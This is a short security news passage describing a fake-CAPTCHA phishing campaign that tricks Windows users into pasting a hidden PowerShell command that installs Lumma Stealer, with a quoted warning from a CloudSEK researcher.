Threat actors create phishing sites hosted on various providers, often utilising content delivery networks. The user visits the fake verification page. These sites present users with a fake Google CAPTCHA page.‍ Upon clicking the “Verify” button, users are tricked into following these unusual instructions:

Open the Run dialogue (Win+R).

Press Ctrl+V to paste copied content.

Press Enter.

Unknown to the user, this action executes a hidden JavaScript function that copies a base64-encoded PowerShell command to the clipboard. The PowerShell command, when executed, downloads the Lumma Stealer malware from a remote server, compromising the victim’s system. The downloaded malware then establishes connections with attacker-controlled domains, posing a risk to users and their data.

"This new tactic is particularly dangerous because it plays on users' trust in widely recognised CAPTCHA verifications, which they encounter regularly online. By disguising malicious activity behind what seems like a routine security check, attackers can easily trick users into executing harmful commands on their systems,” said Anshuman Das, security researcher at CloudSEK.